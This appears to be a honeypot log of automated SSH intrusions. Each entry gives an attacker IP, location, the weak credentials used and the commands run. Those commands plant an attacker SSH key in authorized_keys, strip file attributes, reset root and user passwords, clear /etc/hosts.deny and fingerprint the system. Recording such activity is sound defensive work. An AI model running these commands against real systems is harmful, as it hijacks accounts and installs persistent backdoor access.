$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "1111\nNw5Fg2TqM6HT\nNw5Fg2TqM6HT"|passwd|bash
$ Enter new UNIX password:
$ echo "1111\nNw5Fg2TqM6HT\nNw5Fg2TqM6HT\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 ghost_root_90 (165.232.169.124) β€” Singapore, Singapore Β· 1 session Β· 19 cmds
2026-05-22 09:04 EDT Β· as root/252525
file attribute tampering β†’ SSH key persistence β†’ CPU profiling β†’ execute from /tmp β†’ persistence setup
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo "root:eHdnYFt9SODJ"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 blitz_root_12 (152.53.22.186) β€” Nuremberg, Germany Β· 1 session Β· 19 cmds
2026-05-22 09:01 EDT Β· as root/aa147258
file attribute tampering β†’ SSH key persistence β†’ CPU profiling β†’ execute from /tmp β†’ persistence setup
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo "root:L0aE4M8zXvZy"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 liberty_root_26 (104.225.221.107) β€” Dallas, United States Β· 2 sessions Β· 39 cmds
2026-05-22 08:31 EDT Β· as root/321321321, shyam/shyam
file attribute tampering β†’ SSH key persistence β†’ CPU profiling β†’ execute from /tmp β†’ persistence setup
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—2 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—2 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—2 // CPU profiling
$ echo "root:JLNlJuf0YNz8"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—2 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—2
$ ls -lh $(which ls) Γ—2
$ which ls Γ—2
$ crontab -l Γ—2 // persistence setup
$ w Γ—2 // logged-in users check
$ uname -m Γ—2
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—2 // CPU profiling
$ top Γ—2 // process monitoring
$ uname Γ—2 // OS identification
$ uname -a Γ—2 // OS/kernel identification
$ whoami Γ—2 // privilege check
$ lscpu | grep Model Γ—2
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—2
$ echo -e "shyam\n5d0NViS1tadB\n5d0NViS1tadB"|passwd|bash
$ Enter new UNIX password:
$ echo "shyam\n5d0NViS1tadB\n5d0NViS1tadB\n"|passwd
🎭 borscht_root_4 (78.138.168.46) β€” Al'met'yevsk, Russia Β· 1 session Β· 19 cmds
2026-05-22 08:38 EDT Β· as root/Abc!@#456
file attribute tampering β†’ SSH key persistence β†’ CPU profiling β†’ execute from /tmp β†’ persistence setup
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo "root:jJPNT0kP4KpZ"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 chateau_root_9 (207.180.229.239) β€” Lauterbourg, France Β· 3 sessions Β· 58 cmds
2026-05-17 18:16 EDT Β· as root/1qaz!QAZ, root/Asdqwe123, user/user1234
file attribute tampering β†’ SSH key persistence β†’ CPU profiling β†’ execute from /tmp β†’ persistence setup
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—3 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—3 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—3 // CPU profiling
$ echo "root:UolC7oiNbj0w"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; Γ—2 // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—3 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—3
$ ls -lh $(which ls) Γ—3
$ which ls Γ—3
$ crontab -l Γ—3 // persistence setup
$ w Γ—3 // logged-in users check
$ uname -m Γ—3
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—3 // CPU profiling
$ top Γ—3 // process monitoring
$ uname Γ—3 // OS identification
$ uname -a Γ—3 // OS/kernel identification
$ whoami Γ—3 // privilege check
$ lscpu | grep Model Γ—3
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—3
$ echo -e "user1234\nQSzAgMPnwnMX\nQSzAgMPnwnMX"|passwd|bash
$ Enter new UNIX password:
$ echo "user1234\nQSzAgMPnwnMX\nQSzAgMPnwnMX\n"|passwd
$ echo "root:ABsLfg6gQA7t"|chpasswd|bash
🎭 phantom_root_77 (165.154.6.18) β€” Hong Kong, Hong Kong Β· 2 sessions Β· 39 cmds
2026-05-22 08:17 EDT Β· as root/Asdqwe123, user/user1234
file attribute tampering β†’ SSH key persistence β†’ CPU profiling
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—2 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—2 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—2 // CPU profiling
$ echo -e "user1234\njFWsfhThCvF9\njFWsfhThCvF9"|passwd|bash
$ Enter new UNIX password:
$ echo "user1234\njFWsfhThCvF9\njFWsfhThCvF9\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—2 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—2
$ ls -lh $(which ls) Γ—2
$ which ls Γ—2
$ crontab -l Γ—2 // persistence setup
$ w Γ—2 // logged-in users check
$ uname -m Γ—2
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—2 // CPU profiling
$ top Γ—2 // process monitoring
$ uname Γ—2 // OS identification
$ uname -a Γ—2 // OS/kernel identification
$ whoami Γ—2 // privilege check
$ lscpu | grep Model Γ—2
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—2
$ echo "root:NHAGfqxmyFv2"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
🎭 specter_root_75 (185.242.234.173) β€” Fo Tan, Hong Kong Β· 1 session Β· 19 cmds
2026-05-22 08:24 EDT Β· as root/Password123#
file attribute tampering β†’ SSH key persistence β†’ CPU profiling β†’ execute from /tmp β†’ persistence setup
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo "root:FJ3iEA2KueCb"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 phantom_root_78 (197.140.11.157) β€” El Achour, Algeria Β· 2 sessions Β· 39 cmds
2026-05-22 08:08 EDT Β· as root/Asdqwe123, user/user1234
file attribute tampering β†’ SSH key persistence β†’ CPU profiling β†’ execute from /tmp β†’ persistence setup
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—2 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—2 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—2 // CPU profiling
$ echo "root:YkLQkKGwk51u"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—2 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—2
$ ls -lh $(which ls) Γ—2
$ which ls Γ—2
$ crontab -l Γ—2 // persistence setup
$ w Γ—2 // logged-in users check
$ uname -m Γ—2
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—2 // CPU profiling
$ top Γ—2 // process monitoring
$ uname Γ—2 // OS identification
$ uname -a Γ—2 // OS/kernel identification
$ whoami Γ—2 // privilege check
$ lscpu | grep Model Γ—2
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—2
$ echo -e "user1234\n3uc5V0Iox49N\n3uc5V0Iox49N"|passwd|bash
$ Enter new UNIX password:
$ echo "user1234\n3uc5V0Iox49N\n3uc5V0Iox49N\n"|passwd
🎭 rogue_root_24 (45.172.153.100) β€” Santiago de los Caballeros, Dominican Republic Β· 2 sessions Β· 40 cmds
2026-05-12 22:37 EDT Β· as hengshi/hengshi, prueba/12345
file attribute tampering β†’ SSH key persistence β†’ CPU profiling
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—2 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—2 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—2 // CPU profiling
$ echo -e "hengshi\nIsYAan1s7zWy\nIsYAan1s7zWy"|passwd|bash
$ Enter new UNIX password: Γ—2
$ echo "hengshi\nIsYAan1s7zWy\nIsYAan1s7zWy\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—2 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—2
$ ls -lh $(which ls) Γ—2
$ which ls Γ—2
$ crontab -l Γ—2 // persistence setup
$ w Γ—2 // logged-in users check
$ uname -m Γ—2
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—2 // CPU profiling
$ top Γ—2 // process monitoring
$ uname Γ—2 // OS identification
$ uname -a Γ—2 // OS/kernel identification
$ whoami Γ—2 // privilege check
$ lscpu | grep Model Γ—2
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—2
$ echo -e "12345\nb6QlvVSVGE4K\nb6QlvVSVGE4K"|passwd|bash
$ echo "12345\nb6QlvVSVGE4K\nb6QlvVSVGE4K\n"|passwd
🎭 hanbok (43.128.142.30) β€” Seoul, South Korea Β· 1 session Β· 20 cmds
2026-05-22 08:13 EDT Β· as hengshi/hengshi
file attribute tampering β†’ SSH key persistence β†’ CPU profiling
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "hengshi\ni7Q8scV9QcaV\ni7Q8scV9QcaV"|passwd|bash
$ Enter new UNIX password:
$ echo "hengshi\ni7Q8scV9QcaV\ni7Q8scV9QcaV\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 shadow_root_71 (84.247.146.180) β€” Singapore, Singapore Β· 2 sessions Β· 2 cmds
2026-05-21 13:02 EDT Β· as root/@swissmp@2023, root/blackcat
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ uname -a Γ—2 // OS/kernel identification
🎭 burger_root_42 (45.61.52.18) β€” Los Angeles, United States Β· 1 session Β· 20 cmds
2026-05-22 06:49 EDT Β· as ubuntu/abc123456
file attribute tampering β†’ SSH key persistence β†’ CPU profiling
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "abc123456\nzDXUwyrOgNFh\nzDXUwyrOgNFh"|passwd|bash
$ Enter new UNIX password:
$ echo "abc123456\nzDXUwyrOgNFh\nzDXUwyrOgNFh\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 silk_root_19 (223.74.192.105) β€” Huizhou, China Β· 1 session Β· 20 cmds
2026-05-22 06:37 EDT Β· as grace/grace
file attribute tampering β†’ SSH key persistence β†’ CPU profiling
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "grace\n2s1VzMNAQmT3\n2s1VzMNAQmT3"|passwd|bash
$ Enter new UNIX password:
$ echo "grace\n2s1VzMNAQmT3\n2s1VzMNAQmT3\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 chateau_2 (188.165.48.127) β€” Gravelines, France Β· 1 session Β· 1 cmd
2026-05-22 06:21 EDT Β· as dev/1234
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cat /proc/cpuinfo|grep name|cut -f2 -d':'|uniq -c ; uname -a // CPU profiling
🎭 specter_root_76 (165.154.105.128) β€” Ho Chi Minh City, Vietnam Β· 1 session Β· 20 cmds
2026-05-22 06:17 EDT Β· as grid/grid
file attribute tampering β†’ SSH key persistence β†’ CPU profiling
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
